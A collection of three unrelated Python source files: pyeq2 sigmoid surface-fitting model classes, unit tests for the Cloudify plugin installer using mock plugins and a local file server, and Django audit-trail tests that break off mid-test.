_HTML = 'z = a0 + (a1 / (1.0 + exp(a2 * (x + a3 + a4 * y + a5 * x * y))))'
_leftSideHTML = 'z'
_coefficientDesignators = ['a0', 'a1', 'a2', 'a3', 'a4', 'a5']
_canLinearSolverBeUsedForSSQABS = False
webReferenceURL = ''
baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False
autoGenerateOffsetForm = False
autoGenerateReciprocalForm = True
autoGenerateInverseForms = True
autoGenerateGrowthAndDecayForms = True
independentData1CannotContainZeroFlag = False
independentData1CannotContainPositiveFlag = False
independentData1CannotContainNegativeFlag = False
independentData2CannotContainZeroFlag = False
independentData2CannotContainPositiveFlag = False
independentData2CannotContainNegativeFlag = False
def GetDataCacheFunctions(self):
functionList = []
functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
functionList.append([pyeq2.DataCache.DataCacheFunctions.XY(NameOrValueFlag=1), []])
return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)
def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
x_in = inDataCacheDictionary['X'] # only need to perform this dictionary look-up once
y_in = inDataCacheDictionary['Y'] # only need to perform this dictionary look-up once
a0 = inCoeffs[0]
a1 = inCoeffs[1]
a2 = inCoeffs[2]
a3 = inCoeffs[3]
a4 = inCoeffs[4]
a5 = inCoeffs[5]
try:
temp = a0 + (a1 / (1.0 + numpy.exp(a2 * (x_in + a3 + a4 * y_in + a5 * x_in * y_in))))
return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
except:
return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300
def SpecificCodeCPP(self):
s = "\ttemp = a0 + (a1 / (1.0 + exp(a2 * (x_in + a3 + a4 * y_in + a5 * x_in * y_in))));\n"
return s
class AndreaPrunottoSigmoidB(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
_baseName = "Andrea Prunotto Sigmoid B"
_HTML = 'z = a0 + (a1 / (1.0 + exp(a2 * (x * a3 + a4 * y + a5 * x * y))))'
_leftSideHTML = 'z'
_coefficientDesignators = ['a0', 'a1', 'a2', 'a3', 'a4', 'a5']
_canLinearSolverBeUsedForSSQABS = False
webReferenceURL = ''
baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False
autoGenerateOffsetForm = False
autoGenerateReciprocalForm = True
autoGenerateInverseForms = True
autoGenerateGrowthAndDecayForms = True
independentData1CannotContainZeroFlag = False
independentData1CannotContainPositiveFlag = False
independentData1CannotContainNegativeFlag = False
independentData2CannotContainZeroFlag = False
independentData2CannotContainPositiveFlag = False
independentData2CannotContainNegativeFlag = False
def GetDataCacheFunctions(self):
functionList = []
functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
functionList.append([pyeq2.DataCache.DataCacheFunctions.XY(NameOrValueFlag=1), []])
return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)
def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
x_in = inDataCacheDictionary['X'] # only need to perform this dictionary look-up once
y_in = inDataCacheDictionary['Y'] # only need to perform this dictionary look-up once
a0 = inCoeffs[0]
a1 = inCoeffs[1]
a2 = inCoeffs[2]
a3 = inCoeffs[3]
a4 = inCoeffs[4]
a5 = inCoeffs[5]
try:
temp = a0 + (a1 / (1.0 + numpy.exp(a2 * (x_in * a3 + a4 * y_in + a5 * x_in * y_in))))
return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
except:
return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300
def SpecificCodeCPP(self):
s = "\ttemp = a0 + (a1 / (1.0 + exp(a2 * (x_in * a3 + a4 * y_in + a5 * x_in * y_in))));\n"
return s
class FraserSmithSigmoid(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
_baseName = "Fraser Smith Sigmoid"
_HTML = 'z = 1.0 / ((1.0 + exp(a - bx)) * (1.0 + e(c - dy)))'
_leftSideHTML = 'z'
_coefficientDesignators = ['a', 'b', 'c', 'd']
_canLinearSolverBeUsedForSSQABS = False
webReferenceURL = ''
baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = False
autoGenerateOffsetForm = True
autoGenerateReciprocalForm = False
autoGenerateInverseForms = True
autoGenerateGrowthAndDecayForms = True
independentData1CannotContainZeroFlag = False
independentData1CannotContainPositiveFlag = False
independentData1CannotContainNegativeFlag = False
independentData2CannotContainZeroFlag = False
independentData2CannotContainPositiveFlag = False
independentData2CannotContainNegativeFlag = False
def GetDataCacheFunctions(self):
functionList = []
functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)
def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
x_in = inDataCacheDictionary['X'] # only need to perform this dictionary look-up once
y_in = inDataCacheDictionary['Y'] # only need to perform this dictionary look-up once
a = inCoeffs[0]
b = inCoeffs[1]
c = inCoeffs[2]
d = inCoeffs[3]
try:
temp = 1.0 / ((1.0 + numpy.exp(a - b * x_in)) * (1.0 + numpy.exp(c - d * y_in)))
return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
except:
return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300
def SpecificCodeCPP(self):
s = "\ttemp = 1.0 / ((1.0 + exp(a - b * x_in)) * (1.0 + exp(c - d * y_in)));\n"
return s
class FraserSmithSigmoid_scaled(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
_baseName = "Fraser Smith Sigmoid Scaled"
_HTML = 'z = Scale / ((1.0 + exp(a - bx)) * (1.0 + e(c - dy)))'
_leftSideHTML = 'z'
_coefficientDesignators = ['a', 'b', 'c', 'd', 'Scale']
_canLinearSolverBeUsedForSSQABS = False
webReferenceURL = ''
baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True
autoGenerateOffsetForm = True
autoGenerateReciprocalForm = False
autoGenerateInverseForms = True
autoGenerateGrowthAndDecayForms = True
independentData1CannotContainZeroFlag = False
independentData1CannotContainPositiveFlag = False
independentData1CannotContainNegativeFlag = False
independentData2CannotContainZeroFlag = False
independentData2CannotContainPositiveFlag = False
independentData2CannotContainNegativeFlag = False
def GetDataCacheFunctions(self):
functionList = []
functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)
def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
x_in = inDataCacheDictionary['X'] # only need to perform this dictionary look-up once
y_in = inDataCacheDictionary['Y'] # only need to perform this dictionary look-up once
a = inCoeffs[0]
b = inCoeffs[1]
c = inCoeffs[2]
d = inCoeffs[3]
scale = inCoeffs[4]
try:
temp = scale / ((1.0 + numpy.exp(a - b * x_in)) * (1.0 + numpy.exp(c - d * y_in)))
return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
except:
return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300
def SpecificCodeCPP(self):
s = "\ttemp = Scale / ((1.0 + exp(a - b * x_in)) * (1.0 + exp(c - d * y_in)));\n"
return s
class Sigmoid(pyeq2.Model_3D_BaseClass.Model_3D_BaseClass):
_baseName = "Sigmoid"
_HTML = 'z = a / ((1.0 + exp(b - cx)) * (1.0 + exp(d - fy)))'
_leftSideHTML = 'z'
_coefficientDesignators = ['a', 'b', 'c', 'd', 'f']
_canLinearSolverBeUsedForSSQABS = False
webReferenceURL = ''
baseEquationHasGlobalMultiplierOrDivisor_UsedInExtendedVersions = True
autoGenerateOffsetForm = True
autoGenerateReciprocalForm = True
autoGenerateInverseForms = True
autoGenerateGrowthAndDecayForms = True
independentData1CannotContainZeroFlag = False
independentData1CannotContainPositiveFlag = False
independentData1CannotContainNegativeFlag = False
independentData2CannotContainZeroFlag = False
independentData2CannotContainPositiveFlag = False
independentData2CannotContainNegativeFlag = False
def GetDataCacheFunctions(self):
functionList = []
functionList.append([pyeq2.DataCache.DataCacheFunctions.X(NameOrValueFlag=1), []])
functionList.append([pyeq2.DataCache.DataCacheFunctions.Y(NameOrValueFlag=1), []])
return self.extendedVersionHandler.GetAdditionalDataCacheFunctions(self, functionList)
def CalculateModelPredictions(self, inCoeffs, inDataCacheDictionary):
x_in = inDataCacheDictionary['X'] # only need to perform this dictionary look-up once
y_in = inDataCacheDictionary['Y'] # only need to perform this dictionary look-up once
a = inCoeffs[0]
b = inCoeffs[1]
c = inCoeffs[2]
d = inCoeffs[3]
f = inCoeffs[4]
try:
temp = a / ((1.0 + numpy.exp(b - c * x_in)) * (1.0 + numpy.exp(d - f * y_in)))
return self.extendedVersionHandler.GetAdditionalModelPredictions(temp, inCoeffs, inDataCacheDictionary, self)
except:
return numpy.ones(len(inDataCacheDictionary['DependentData'])) * 1.0E300
def SpecificCodeCPP(self):
s = "\ttemp = a / ((1.0 + exp(b - c * x_in)) * (1.0 + exp(d - f * y_in)));\n"
return s
|
|
########
# Copyright (c) 2013 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
import os
from os.path import dirname
import tempfile
import shutil
import tarfile
import filecmp
import testtools
from cloudify.exceptions import NonRecoverableError
from cloudify.mocks import MockCloudifyContext
from cloudify.utils import LocalCommandRunner
from cloudify.utils import setup_logger
from plugin_installer.tasks import install, get_url_and_args, \
update_includes, parse_pip_version, \
is_pip6_or_higher, extract_plugin_dir
from cloudify.constants import CELERY_WORK_DIR_PATH_KEY
from cloudify.constants import VIRTUALENV_PATH_KEY
from cloudify.constants import LOCAL_IP_KEY
from cloudify.constants import MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL_KEY
from plugin_installer.tests.file_server import FileServer
from plugin_installer.tests.file_server import PORT
logger = setup_logger('test_plugin_installer')
runner = LocalCommandRunner()
test_file_server = FileServer(dirname(__file__))
MOCK_PLUGIN = 'mock-plugin'
MOCK_PLUGIN_WITH_DEPENDENCIES = 'mock-with-dependencies-plugin'
MOCK_PLUGIN_WITH_INSTALL_ARGS = 'mock-with-install-args-plugin'
ZIP_SUFFIX = 'zip'
TAR_SUFFIX = 'tar'
TEST_BLUEPRINT_ID = 'mock_blueprint_id'
PLUGINS_DIR = '{0}/plugins'.format(TEST_BLUEPRINT_ID)
MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL = 'http://localhost:{0}' \
.format(PORT)
def _get_local_path(ctx, plugin):
return os.path.join(dirname(__file__),
plugin['source'])
class PluginInstallerTestCase(testtools.TestCase):
@classmethod
def setUpClass(cls):
# install virtual env. this ensures the env that will be later created
# will use the python env the test is running in (e.g. might be 2.6)
runner.run('pip install virtualenv')
# create tar files for the mock plugins used by the tests
cls.create_plugin_tar(MOCK_PLUGIN)
cls.create_plugin_tar(MOCK_PLUGIN_WITH_DEPENDENCIES)
cls.create_plugin_tar(MOCK_PLUGIN_WITH_INSTALL_ARGS)
try:
# start file server
test_file_server.start()
except Exception as e:
logger.info('Failed to start local file server, '
'reported error: {0}'.format(e.message))
if test_file_server:
try:
test_file_server.stop()
except Exception as e:
logger.info('failed to stop local file server: {0}'
.format(e.message))
@classmethod
def tearDownClass(cls):
if test_file_server:
try:
test_file_server.stop()
except Exception as e:
logger.info('failed to stop local file server: {0}'
.format(e.message))
def setUp(self):
super(PluginInstallerTestCase, self).setUp()
self.temp_folder = tempfile.mkdtemp()
# Create a virtualenv in a temp folder.
# this will be used for actually installing plugins of tests.
os.environ[LOCAL_IP_KEY] = 'localhost'
LocalCommandRunner().run('virtualenv {0}'.format(self.temp_folder))
os.environ[VIRTUALENV_PATH_KEY] = self.temp_folder
self.ctx = MockCloudifyContext(
blueprint_id=TEST_BLUEPRINT_ID
)
os.environ[CELERY_WORK_DIR_PATH_KEY] = self.temp_folder
os.environ[MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL_KEY] \
= MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL
def tearDown(self):
if os.path.exists(self.temp_folder):
shutil.rmtree(self.temp_folder)
super(PluginInstallerTestCase, self).tearDown()
def _assert_plugin_installed(self, package_name,
plugin, dependencies=None):
if not dependencies:
dependencies = []
runner = LocalCommandRunner()
out = runner.run(
'{0}/bin/pip list | grep {1}'
.format(self.temp_folder, plugin['name'])).std_out
self.assertIn(package_name, out)
for dependency in dependencies:
self.assertIn(dependency, out)
def test_get_url_and_args_http_no_args(self):
url, args = get_url_and_args(self.ctx.blueprint.id,
{'source': 'http://google.com'})
self.assertEqual(url, 'http://google.com')
self.assertEqual(args, '')
def test_get_url_https(self):
url, args = get_url_and_args(self.ctx.blueprint.id,
{'source': 'https://google.com',
'install_arguments': '--pre'})
self.assertEqual(url, 'https://google.com')
self.assertEqual(args, '--pre')
def test_get_url_faulty_schema(self):
self.assertRaises(NonRecoverableError,
get_url_and_args,
self.ctx.blueprint.id,
{'source': 'bla://google.com'})
def test_get_url_and_args_local_plugin(self):
mock_plugin = {
'source': MOCK_PLUGIN,
'install_arguments': '-r requirements'
}
url, args = get_url_and_args(self.ctx.blueprint.id, mock_plugin)
self.assertEqual(url,
'{0}/{1}/{2}.{3}'
.format(
MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL,
PLUGINS_DIR,
MOCK_PLUGIN, ZIP_SUFFIX))
def test_extract_url(self):
plugin_source = '{0}/{1}/{2}.{3}'.format(
MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
MOCK_PLUGIN, TAR_SUFFIX)
plugin = {
'name': MOCK_PLUGIN,
'source': plugin_source
}
url, args = get_url_and_args(self.ctx.blueprint.id, plugin)
source_plugin_path = os.path.join(dirname(__file__), MOCK_PLUGIN)
extracted_plugin_path = extract_plugin_dir(url)
self.assertTrue(PluginInstallerTestCase.are_dir_trees_equal(
source_plugin_path, extracted_plugin_path))
def test_install(self):
plugin_source = '{0}/{1}/{2}.{3}'.format(
MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
MOCK_PLUGIN, TAR_SUFFIX)
plugin = {
'name': MOCK_PLUGIN,
'source': plugin_source
}
ctx = MockCloudifyContext(blueprint_id=TEST_BLUEPRINT_ID)
install(ctx, plugins=[plugin])
self._assert_plugin_installed(MOCK_PLUGIN, plugin)
# Assert includes file was written
out = LocalCommandRunner().run(
'cat {0}'.format(
os.path.join(self.temp_folder,
'celeryd-includes'))).std_out
self.assertIn('mock_for_test.module', out)
def test_install_with_dependencies(self):
plugin_source = '{0}/{1}/{2}.{3}'.format(
MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
MOCK_PLUGIN_WITH_DEPENDENCIES, TAR_SUFFIX)
plugin = {
'name': MOCK_PLUGIN_WITH_DEPENDENCIES,
'source': plugin_source
}
ctx = MockCloudifyContext(blueprint_id=TEST_BLUEPRINT_ID)
install(ctx, plugins=[plugin])
self._assert_plugin_installed(MOCK_PLUGIN_WITH_DEPENDENCIES,
plugin,
dependencies=['simplejson'])
# Assert includes file was written
out = LocalCommandRunner().run(
'cat {0}'.format(
os.path.join(self.temp_folder,
'celeryd-includes'))).std_out
self.assertIn('mock_with_dependencies_for_test.module', out)
def test_install_with_install_args(self):
plugin_source = '{0}/{1}/{2}.{3}'.format(
MANAGER_FILE_SERVER_BLUEPRINTS_ROOT_URL, PLUGINS_DIR,
MOCK_PLUGIN_WITH_INSTALL_ARGS, TAR_SUFFIX)
plugin = {
'name': MOCK_PLUGIN_WITH_INSTALL_ARGS,
'source': plugin_source,
'install_arguments': '-r requirements.txt'
}
ctx = MockCloudifyContext(blueprint_id=TEST_BLUEPRINT_ID)
install(ctx, plugins=[plugin])
# cloudify-rest-client is specified in requirements.txt
self._assert_plugin_installed(MOCK_PLUGIN_WITH_INSTALL_ARGS,
plugin,
dependencies=['cloudify-rest-client'])
# Assert includes file was written
out = LocalCommandRunner().run(
'cat {0}'.format(
os.path.join(self.temp_folder,
'celeryd-includes'))).std_out
self.assertIn('mock_with_install_args_for_test.module', out)
def test_write_to_empty_includes(self):
update_includes(['a.tasks', 'b.tasks'])
# The includes file will be created
# in the temp folder for this test
with open('{0}/celeryd-includes'
.format(self.temp_folder), mode='r') as f:
includes = f.read()
self.assertEquals("INCLUDES=a.tasks,b.tasks\n", includes)
def test_write_to_existing_includes(self):
# Create initial includes file
update_includes(['test.tasks'])
# Append to that file
update_includes(['a.tasks', 'b.tasks'])
with open('{0}/celeryd-includes'
.format(self.temp_folder), mode='r') as f:
includes = f.read()
self.assertEquals(
"INCLUDES=test.tasks,a.tasks,b.tasks\n",
includes)
@staticmethod
def create_plugin_tar(plugin_dir_name):
plugin_source_path = os.path.join(dirname(__file__), plugin_dir_name)
# create the plugins directory if doesn't exist
plugins_dir_path = os.path.join(dirname(__file__), PLUGINS_DIR)
if not os.path.exists(plugins_dir_path):
os.makedirs(plugins_dir_path)
# the tar file will be created under mock_blueprint_id/plugins
target_tar_file_path = '{0}/{1}.{2}'.format(plugins_dir_path,
plugin_dir_name,
TAR_SUFFIX)
# create the file, if it doesn't exist
if not os.path.exists(target_tar_file_path):
plugin_tar_file = tarfile.TarFile(target_tar_file_path, 'w')
plugin_tar_file.add(plugin_source_path, plugin_dir_name)
plugin_tar_file.close()
@staticmethod
def are_dir_trees_equal(dir1, dir2):
"""
Compare two directories recursively. Files in each directory are
assumed to be equal if their names and contents are equal.
@param dir1: First directory path
@param dir2: Second directory path
@return: True if the directory trees are the same and
there were no errors while accessing the directories or files,
False otherwise.
"""
# compare file lists in both dirs. If found different lists
# or "funny" files (failed to compare) - return false
dirs_cmp = filecmp.dircmp(dir1, dir2)
if len(dirs_cmp.left_only) > 0 or len(dirs_cmp.right_only) > 0 or \
len(dirs_cmp.funny_files) > 0:
return False
# compare the common files between dir1 and dir2
(match, mismatch, errors) = filecmp.cmpfiles(
dir1, dir2, dirs_cmp.common_files, shallow=False)
if len(mismatch) > 0 or len(errors) > 0:
return False
# continue to compare sub-directories, recursively
for common_dir in dirs_cmp.common_dirs:
new_dir1 = os.path.join(dir1, common_dir)
new_dir2 = os.path.join(dir2, common_dir)
if not PluginInstallerTestCase.are_dir_trees_equal(
new_dir1, new_dir2):
return False
return True
class PipVersionParserTestCase(testtools.TestCase):
def test_parse_long_format_version(self):
version_tupple = parse_pip_version('1.5.4')
self.assertEqual(('1', '5', '4'), version_tupple)
def test_parse_short_format_version(self):
version_tupple = parse_pip_version('6.0')
self.assertEqual(('6', '0', ''), version_tupple)
def test_pip6_not_higher(self):
result = is_pip6_or_higher('1.5.4')
self.assertEqual(result, False)
def test_pip6_exactly(self):
result = is_pip6_or_higher('6.0')
self.assertEqual(result, True)
def test_pip6_is_higher(self):
result = is_pip6_or_higher('6.0.6')
self.assertEqual(result, True)
def test_parse_invalid_major_version(self):
expected_err_msg = 'Invalid pip version: "a.5.4", major version is ' \
'"a" while expected to be a number'
self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
parse_pip_version, 'a.5.4')
def test_parse_invalid_minor_version(self):
expected_err_msg = 'Invalid pip version: "1.a.4", minor version is ' \
'"a" while expected to be a number'
self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
parse_pip_version, '1.a.4')
def test_parse_too_short_version(self):
expected_err_msg = 'Unknown formatting of pip version: ' \
'"6", expected ' \
'dot-delimited numbers ' \
'\(e.g. "1.5.4", "6.0"\)'
self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
parse_pip_version, '6')
def test_parse_numeric_version(self):
expected_err_msg = 'Invalid pip version: 6 is not a string'
self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
parse_pip_version, 6)
def test_parse_alpha_version(self):
expected_err_msg = 'Unknown formatting of pip ' \
'version: "a", expected ' \
'dot-delimited ' \
'numbers \(e.g. "1.5.4", "6.0"\)'
self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
parse_pip_version, 'a')
def test_parse_wrong_obj(self):
expected_err_msg = 'Invalid pip version: \[6\] is not a string'
self.assertRaisesRegex(NonRecoverableError, expected_err_msg,
parse_pip_version, [6])
|
|
import datetime
from django.test import TestCase
import audit_trail
from audit_trail.models import AuditTrail
from ..models import TestModelTrackAllFields, TestModelTrackOneField, TestModelWithFieldLabels, \
Post, Comment, User, AA, AB, BB, ShortcutTestModel, Post1, Comment1, Person, Animal, SomePerson
class TestAuditTrail(TestCase):
def test_create_audit_trail_on_creation(self):
model = TestModelTrackAllFields.objects.create(char='a')
self.assertEqual(AuditTrail.objects.all().count(), 1)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': None,
'old_value_string': None,
'new_value': 'a',
'new_value_string': 'a',
'field_label': 'Char'
}
})
def test_create_audit_trail_on_deletion(self):
model = TestModelTrackAllFields.objects.create(char='a')
self.assertEqual(AuditTrail.objects.all().count(), 1)
model.delete()
self.assertEqual(AuditTrail.objects.all().count(), 2)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.DELETED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': 'a',
'old_value_string': 'a',
'new_value': None,
'new_value_string': None,
'field_label': 'Char'
}
})
def test_audit_for_selected_field(self):
self.assertEqual(AuditTrail.objects.all().count(), 0)
model = TestModelTrackOneField.objects.create(char='a')
model.text = 'sometext'
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 1)
model.char = 'b'
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 2)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': 'a',
'old_value_string': 'a',
'new_value': 'b',
'new_value_string': 'b',
'field_label': 'Char'
}
})
def test_audit_trail_history_for_all_fields(self):
model = TestModelTrackAllFields.objects.create(char='a', char2='x')
self.assertEqual(AuditTrail.objects.all().count(), 1)
model.char = 'b'
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 2)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': 'a',
'old_value_string': 'a',
'new_value': 'b',
'new_value_string': 'b',
'field_label': 'Char'
}
})
model.char2 = 'y'
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 3)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char2': {
'old_value': 'x',
'old_value_string': 'x',
'new_value': 'y',
'new_value_string': 'y',
'field_label': 'Char2'
}
})
trail = AuditTrail.objects.all()[1]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': 'a',
'old_value_string': 'a',
'new_value': 'b',
'new_value_string': 'b',
'field_label': 'Char'
}
})
model.char = 'c'
model.char2 = 'z'
model.save()
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': 'b',
'old_value_string': 'b',
'new_value': 'c',
'new_value_string': 'c',
'field_label': 'Char'
},
'char2': {
'old_value': 'y',
'old_value_string': 'y',
'new_value': 'z',
'new_value_string': 'z',
'field_label': 'Char2'
}
})
def test_field_labels(self):
TestModelWithFieldLabels.objects.create(char='a', char2='x', char_3='1')
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.get_changes()['char']['field_label'], 'Char 1')
self.assertEqual(trail.get_changes()['char2']['field_label'], 'Char 2')
self.assertEqual(trail.get_changes()['char_3']['field_label'], 'Char 3')
def test_related_tracking_init_watcher_for_subclass(self):
# We only initialized audit on Post but Comment.should be created automatically
self.assertIsNotNone(getattr(Comment, 'audit', None))
def test_related_tracking(self):
author = User.objects.create()
post = Post.objects.create(author=author)
self.assertEqual(AuditTrail.objects.all().count(), 1)
comment = Comment.objects.create()
self.assertEqual(AuditTrail.objects.all().count(), 1)
comment = Comment.objects.create(post=post)
self.assertEqual(AuditTrail.objects.all().count(), 3)
post_trail = AuditTrail.objects.all()[0]
comment_trail = AuditTrail.objects.all()[1]
self.assertEqual(post_trail.action, AuditTrail.ACTIONS.RELATED_CHANGED)
self.assertEqual(post_trail.related_trail, comment_trail)
def test_fk_tracking(self):
author = User.objects.create()
self.assertEqual(AuditTrail.objects.all().count(), 0)
post = Post.objects.create(author=author)
self.assertEqual(AuditTrail.objects.all().count(), 1)
author.name = 'new name'
author.save()
self.assertEqual(AuditTrail.objects.all().count(), 3)
post_trail = AuditTrail.objects.all()[0]
user_trail = AuditTrail.objects.all()[1]
self.assertEqual(post_trail.action, AuditTrail.ACTIONS.RELATED_CHANGED)
self.assertEqual(post_trail.related_trail, user_trail)
author.delete()
self.assertEqual(AuditTrail.objects.all().count(), 5)
def test_related_tracking_ordering(self):
self.assertEqual(AA.audit.track_related, ['ab_set'])
self.assertEqual(BB.audit.track_related, ['ab_set'])
self.assertEqual(AB.audit.track_only_with_related, False)
self.assertEqual(sorted(AB.audit.notify_related), ['aa', 'bb'])
def test_shortcut(self):
model = ShortcutTestModel.objects.create(name='a')
self.assertEqual(AuditTrail.objects.all().count(), 1)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
self.assertEqual(trail.get_changes(), {
'name': {
'old_value': None,
'old_value_string': None,
'new_value': 'a',
'new_value_string': 'a',
'field_label': 'Name'
}
})
def test_shortcut_override_class_attribute(self):
self.assertEqual(Post1.audit.track_related, ['comment1_set'])
self.assertEqual(Comment1.audit.track_only_with_related, False)
self.assertEqual(Comment1.audit.fields, ['text'])
def test_queryset_changes(self):
model = TestModelTrackAllFields.objects.create(char='a')
self.assertEqual(AuditTrail.objects.all().count(), 1)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': None,
'old_value_string': None,
'new_value': 'a',
'new_value_string': 'a',
'field_label': 'Char'
}
})
model.char2 = 'b'
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 2)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char2': {
'old_value': None,
'old_value_string': None,
'new_value': 'b',
'new_value_string': 'b',
'field_label': 'Char2'
}
})
trails = audit_trail.get_for_object(model)
self.assertEqual(trails.get_changes()['char2'], {
'old_value': None,
'old_value_string': None,
'new_value': 'b',
'new_value_string': 'b',
'field_label': 'Char2',
'field_name': 'char2'
})
self.assertEqual(trails.get_changes()['char'], {
'old_value': None,
'old_value_string': None,
'new_value': 'a',
'new_value_string': 'a',
'field_label': 'Char',
'field_name': 'char'
})
model.char = 'AAA'
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 3)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': 'a',
'old_value_string': 'a',
'new_value': 'AAA',
'new_value_string': 'AAA',
'field_label': 'Char'
}
})
trails = audit_trail.get_for_object(model)
changes = trails.get_changes()
self.assertEqual(changes['char2'], {
'old_value': None,
'old_value_string': None,
'new_value': 'b',
'new_value_string': 'b',
'field_label': 'Char2',
'field_name': 'char2'
})
self.assertEqual(changes['char'], {
'old_value': None,
'old_value_string': None,
'new_value': 'AAA',
'new_value_string': 'AAA',
'field_label': 'Char',
'field_name': 'char'
})
def test_queryset_changes_reset_if_same_value(self):
model = TestModelTrackAllFields.objects.create(char='a')
self.assertEqual(AuditTrail.objects.all().count(), 1)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.CREATED)
self.assertEqual(trail.get_changes(), {
'char': {
'old_value': None,
'old_value_string': None,
'new_value': 'a',
'new_value_string': 'a',
'field_label': 'Char'
}
})
model.char2 = 'b'
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 2)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char2': {
'old_value': None,
'old_value_string': None,
'new_value': 'b',
'new_value_string': 'b',
'field_label': 'Char2'
}
})
model.char2 = None
model.save()
self.assertEqual(AuditTrail.objects.all().count(), 3)
trail = AuditTrail.objects.all()[0]
self.assertEqual(trail.action, AuditTrail.ACTIONS.UPDATED)
self.assertEqual(trail.get_changes(), {
'char2': {
'old_value': 'b',
'old_value_string': 'b',
'new_value': None,
'new_value_string': None,
'field_label': 'Char2'
}
})
trails = audit_trail.get_for_object(model)
self.assertEqual(len(trails.get_changes().keys()), 1)
self.assertEqual(trails.get_changes(), {
'char': {
